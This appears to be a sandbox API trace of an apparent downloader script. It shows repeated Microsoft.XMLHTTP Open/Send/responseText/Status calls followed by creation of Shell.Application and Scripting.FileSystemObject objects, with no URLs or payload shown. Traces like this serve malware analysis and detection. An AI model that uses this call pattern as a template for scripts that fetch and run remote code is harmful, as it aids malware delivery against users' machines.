	[0417.586] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0417.586] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0417.586] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0417.586] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0417.586] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0417.587] ??2@YAPEAX_K@Z () returned 0x62f310
	[0417.587] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0417.587] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0417.587] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0417.587] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0417.587] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0417.587] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0417.587] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0417.587] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0417.587] longjmp () 
	[0417.587] longjmp () 
	[0417.587] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0417.587] SysStringLen (param_1=0x0) returned 0x0
	[0417.587] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0417.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0417.588] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72f0) returned 0x0
	[0417.588] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0417.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0417.588] ??2@YAPEAX_K@Z () returned 0x62f330
	[0417.588] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f330) 
	[0417.588] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0417.588] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0417.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72f0) returned 0x0
	[0417.588] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72f0) returned 0x3
	[0417.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0417.588] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0417.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0417.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0417.588] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0417.589] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0419.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0419.003] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0419.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0419.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0419.003] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0419.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0419.003] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0419.003] SysStringLen (param_1=0x0) returned 0x0
	[0419.003] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0419.003] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0419.003] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0419.003] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0419.004] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0419.004] ??2@YAPEAX_K@Z () returned 0x62f350
	[0419.004] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0419.004] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0419.004] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0419.004] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0419.004] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0419.004] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0419.004] SysStringLen (param_1=0x0) returned 0x0
	[0419.004] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0419.007] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0419.007] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0419.007] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0419.007] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0419.007] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0419.008] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0419.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0419.887] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0419.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0419.888] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0419.888] SysStringLen (param_1=0x0) returned 0x0
	[0419.888] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0419.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0419.889] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72f0) returned 0x0
	[0419.889] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0419.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0419.889] ??2@YAPEAX_K@Z () returned 0x62f330
	[0419.889] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0419.889] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0419.889] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0419.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72f0) returned 0x0
	[0419.889] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72f0) returned 0x3
	[0419.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0419.889] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0419.892] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0419.892] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0419.892] SysStringLen (param_1=0x0) returned 0x0
	[0419.892] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0419.892] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0419.892] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c70) returned 0x0
	[0419.892] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0419.892] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0419.892] ??2@YAPEAX_K@Z () returned 0x62f310
	[0419.892] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0419.892] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0419.893] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0419.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c70) returned 0x0
	[0419.893] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c70) returned 0x3
	[0419.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0419.893] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c70, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0419.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0419.893] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0419.893] SysStringLen (param_1=0x0) returned 0x0
